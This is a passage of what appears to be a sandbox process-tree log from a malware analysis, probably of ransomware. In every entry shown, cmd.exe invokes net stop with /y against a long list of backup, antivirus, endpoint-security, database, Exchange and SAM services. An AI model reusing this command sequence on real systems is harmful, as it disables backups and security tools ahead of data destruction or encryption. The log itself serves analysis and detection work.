  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
      4⤵
      PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Enterprise Client Service" /y
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\net.exe
    net stop "Enterprise Client Service" /y
    3⤵
    PID:1828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Enterprise Client Service" /y
      4⤵
      PID:1620
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQLsafe Backup Service" /y
  2⤵
  PID:1948
- - C:\Windows\SysWOW64\net.exe
    net stop "SQLsafe Backup Service" /y
    3⤵
    PID:2104
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
      4⤵
      PID:1936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "SQLsafe Filter Service" /y
  2⤵
  PID:2812
- - C:\Windows\SysWOW64\net.exe
    net stop "SQLsafe Filter Service" /y
    3⤵
    PID:2444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
      4⤵
      PID:3944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y
  2⤵
  PID:3920
- - C:\Windows\SysWOW64\net.exe
    net stop "Veeam Backup Catalog Data Service" /y
    3⤵
    PID:3964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
      4⤵
      PID:3988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AcronisAgent /y
  2⤵
  PID:3928
- - C:\Windows\SysWOW64\net.exe
    net stop AcronisAgent /y
    3⤵
    PID:3324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:3880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop AcrSch2Svc /y
  2⤵
  PID:1564
- - C:\Windows\SysWOW64\net.exe
    net stop AcrSch2Svc /y
    3⤵
    PID:740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop Antivirus /y
  2⤵
  PID:2776
- - C:\Windows\SysWOW64\net.exe
    net stop Antivirus /y
    3⤵
    PID:3152
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:2332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ARSM /y
  2⤵
  PID:3144
- - C:\Windows\SysWOW64\net.exe
    net stop ARSM /y
    3⤵
    PID:412
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:3884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecAgentAccelerator /y
  2⤵
  PID:3116
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentAccelerator /y
    3⤵
    PID:3088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecAgentBrowser /y
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentBrowser /y
    3⤵
    PID:908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecDeviceMediaService /y
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecDeviceMediaService /y
    3⤵
    PID:1612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:2432
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecJobEngine /y
  2⤵
  PID:2108
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecJobEngine /y
    3⤵
    PID:2516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:3112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecManagementService /y
  2⤵
  PID:2440
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecManagementService /y
    3⤵
    PID:3908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:3940
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecRPCService /y
  2⤵
  PID:3460
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecRPCService /y
    3⤵
    PID:3300
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:3912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecVSSProvider /y
  2⤵
  PID:3572
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecVSSProvider /y
    3⤵
    PID:1712
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop bedbg /y
  2⤵
  PID:3184
- - C:\Windows\SysWOW64\net.exe
    net stop bedbg /y
    3⤵
    PID:2484
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:3872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop DCAgent /y
  2⤵
  PID:3816
- - C:\Windows\SysWOW64\net.exe
    net stop DCAgent /y
    3⤵
    PID:2644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:1344
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EPSecurityService /y
  2⤵
  PID:3952
- - C:\Windows\SysWOW64\net.exe
    net stop EPSecurityService /y
    3⤵
    PID:1000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EPUpdateService /y
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\net.exe
    net stop EPUpdateService /y
    3⤵
    PID:2824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:1236
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EraserSvc11710 /y
  2⤵
  PID:1756
- - C:\Windows\SysWOW64\net.exe
    net stop EraserSvc11710 /y
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:2252
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EsgShKernel /y
  2⤵
  PID:2056
- - C:\Windows\SysWOW64\net.exe
    net stop EsgShKernel /y
    3⤵
    PID:3544
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:4016
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop FA_Scheduler /y
  2⤵
  PID:3876
- - C:\Windows\SysWOW64\net.exe
    net stop FA_Scheduler /y
    3⤵
    PID:3452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop IISAdmin /y
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\net.exe
    net stop IISAdmin /y
    3⤵
    PID:2560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:3820
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop IMAP4Svc /y
  2⤵
  PID:472
- - C:\Windows\SysWOW64\net.exe
    net stop IMAP4Svc /y
    3⤵
    PID:3224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IMAP4Svc /y
      4⤵
      PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop McShield /y
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\net.exe
    net stop McShield /y
    3⤵
    PID:800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:1292
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop McTaskManager /y
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\net.exe
    net stop McTaskManager /y
    3⤵
    PID:2404
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfemms /y
  2⤵
  PID:2248
- - C:\Windows\SysWOW64\net.exe
    net stop mfemms /y
    3⤵
    PID:2344
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:3672
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfevtp /y
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\net.exe
    net stop mfevtp /y
    3⤵
    PID:3932
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:3540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MMS /y
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\net.exe
    net stop MMS /y
    3⤵
    PID:3520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mozyprobackup /y
  2⤵
  PID:348
- - C:\Windows\SysWOW64\net.exe
    net stop mozyprobackup /y
    3⤵
    PID:3556
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:420
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer /y
  2⤵
  PID:3808
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer /y
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:1072
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer100 /y
  2⤵
  PID:1216
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer100 /y
    3⤵
    PID:1224
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:2512
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer110 /y
  2⤵
  PID:3580
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer110 /y
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:3744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeES /y
  2⤵
  PID:3916
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeES /y
    3⤵
    PID:3852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:3188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeIS /y
  2⤵
  PID:3036
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS /y
    3⤵
    PID:2672
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:4092
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeMGMT /y
  2⤵
  PID:3684
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMGMT /y
    3⤵
    PID:3548
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:632
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeMTA /y
  2⤵
  PID:1356
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMTA /y
    3⤵
    PID:2552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeSA /y
  2⤵
  PID:2084
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA /y
    3⤵
    PID:2076
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:3048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeSRS /y
  2⤵
  PID:2488
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSRS /y
    3⤵
    PID:4024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:3824
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$SQL_2008 /y
  2⤵
  PID:3516
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SQL_2008 /y
    3⤵
    PID:1432
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:2932
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$TPS /y
  2⤵
  PID:2492
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPS /y
    3⤵
    PID:3924
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:2264
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$TPSAMA /y
  2⤵
  PID:996
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPSAMA /y
    3⤵
    PID:508
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:4008
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$BKUPEXEC /y
  2⤵
  PID:1212
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$BKUPEXEC /y
    3⤵
    PID:3776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:4012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$ECWDB2 /y
  2⤵
  PID:2260
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ECWDB2 /y
    3⤵
    PID:2940
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3888
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:3256
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:3528
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3812
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1452
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:856
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:3576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:3960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3984
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SBSMONITORING /y
    3⤵
    PID:3564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:2708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SHAREPOINT /y
  2⤵
  PID:4040
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SHAREPOINT /y
    3⤵
    PID:3560
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:4048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SQL_2008 /y
  2⤵
  PID:3552
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQL_2008 /y
    3⤵
    PID:1360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:804
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$TPS /y
  2⤵
  PID:3980
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPS /y
    3⤵
    PID:852
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:3296
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$TPSAMA /y
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPSAMA /y
    3⤵
    PID:3136
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:3668
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:3996
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2328
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:2400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:1172
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher /y
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher /y
    3⤵
    PID:4036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher /y
      4⤵
      PID:2416
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:788
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:1736
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:3336
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:2836
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:3272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:1932
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:4116
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:4152
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:4172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:4192
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:4228
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:4248
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:4268
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:4324
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:4344
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:4380
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:4400
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:4424
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:4460
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:4480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLSERVER /y
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLSERVER /y
    3⤵
    PID:4536
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:4556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerADHelper100 /y
  2⤵
  PID:4576
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100 /y
    3⤵
    PID:4612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:4632
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerOLAPService /y
  2⤵
  PID:4652
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerOLAPService /y
    3⤵
    PID:4688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MySQL57 /y
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\net.exe
    net stop MySQL57 /y
    3⤵
    PID:4764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:4784
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ntrtscan /y
  2⤵
  PID:4804
- - C:\Windows\SysWOW64\net.exe
    net stop ntrtscan /y
    3⤵
    PID:4840
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:4860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop OracleClientCache80 /y
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\net.exe
    net stop OracleClientCache80 /y
    3⤵
    PID:4916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:4936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop PDVFSService /y
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\net.exe
    net stop PDVFSService /y
    3⤵
    PID:4992
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop POP3Svc /y
  2⤵
  PID:5032
- - C:\Windows\SysWOW64\net.exe
    net stop POP3Svc /y
    3⤵
    PID:5068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:5088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer /y
  2⤵
  PID:5108
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer /y
    3⤵
    PID:3896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:3148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$SQL_2008 /y
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SQL_2008 /y
    3⤵
    PID:4148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:4200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4212
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:4332
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$TPS /y
  2⤵
  PID:4316
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPS /y
    3⤵
    PID:4360
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:4412
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$TPSAMA /y
  2⤵
  PID:4372
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPSAMA /y
    3⤵
    PID:4496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:4464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop RESvc /y
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\net.exe
    net stop RESvc /y
    3⤵
    PID:4552
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:4504
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop sacsvr /y
  2⤵
  PID:4592
- - C:\Windows\SysWOW64\net.exe
    net stop sacsvr /y
    3⤵
    PID:4604
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:4588
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SamSs /y
  2⤵
  PID:4724
- - C:\Windows\SysWOW64\net.exe
    net stop SamSs /y
    3⤵
    PID:4676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:4772
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SAVAdminService /y
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\net.exe
    net stop SAVAdminService /y
    3⤵
    PID:4812
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:4872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SAVService /y
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\net.exe
    net stop SAVService /y
    3⤵
    PID:4944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:4928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SDRSVC /y
  2⤵
  PID:4904
- - C:\Windows\SysWOW64\net.exe
    net stop SDRSVC /y
    3⤵
    PID:5016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:4988
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SepMasterService /y
  2⤵
  PID:5040
- - C:\Windows\SysWOW64\net.exe
    net stop SepMasterService /y
    3⤵
    PID:5072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:5052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ShMonitor /y
  2⤵
  PID:1628
